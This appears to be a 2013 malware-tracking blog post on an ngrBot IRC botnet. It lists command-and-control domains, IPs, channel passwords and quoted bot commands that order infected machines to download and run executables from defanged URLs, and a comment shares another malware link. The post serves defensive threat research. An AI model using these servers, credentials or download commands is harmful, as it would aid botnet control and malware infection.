ads.pr4d.tk/teams.xsaudix.net/y.servicesql.info (ngrBot hosted in United States Scranton Network Operations Center Inc.)

This botnet was found by an anonymous guy here; thanks to him for the submission.

Resolved : [ads.pr4d.tk] To [64.120.186.229]
Resolved : [teams.xsaudix.net] To [64.120.186.230] arab heckers
Resolved : [y.servicesql.info] To [64.120.186.228]

Server: 64.120.186.229:1433
Username: zdbcuzs
Nickname: n{DE|XPa}zdbcuzs
Channel: #tmw5 (Password: ngrBot)
Channeltopic: :!u5 hxxp://bmc.linkpc.net/download/s1.exe 5b8fe0ee31617ee9596a5861a2192304 !u5 hxxp://bmc.linkpc.net/s1cr.exe cdfc01b434fc787d487ce088dd391e0b !u6 hxxp://bmc.linkpc.net/chat.exe 7140176e63651b027fd5f3b19252c4bf

Server: 64.120.186.228:1434
Username: mmgamzu
Nickname: n{DE|XPa}mmgamzu
Channel: #mrag (Password: ngrBot)
Channeltopic: :~u5 hxxp://bmc.linkpc.net/s1cr.exe cdfc01b434fc787d487ce088dd391e0b ~mod usbi on ~mod bdns on

Hosting info:
http://whois.domaintools.com/64.120.186.230

http://whois.domaintools.com/64.120.186.229

2 Comments

Jorgee - January 31, 2013 at 6:34 pm

Pig, check this binary I found yesterday 😉
hxxp://thomas-stelthove.de/1.exe

Pig - January 31, 2013 at 6:40 pm

Thank you Jorgee for the sample, will check this now.
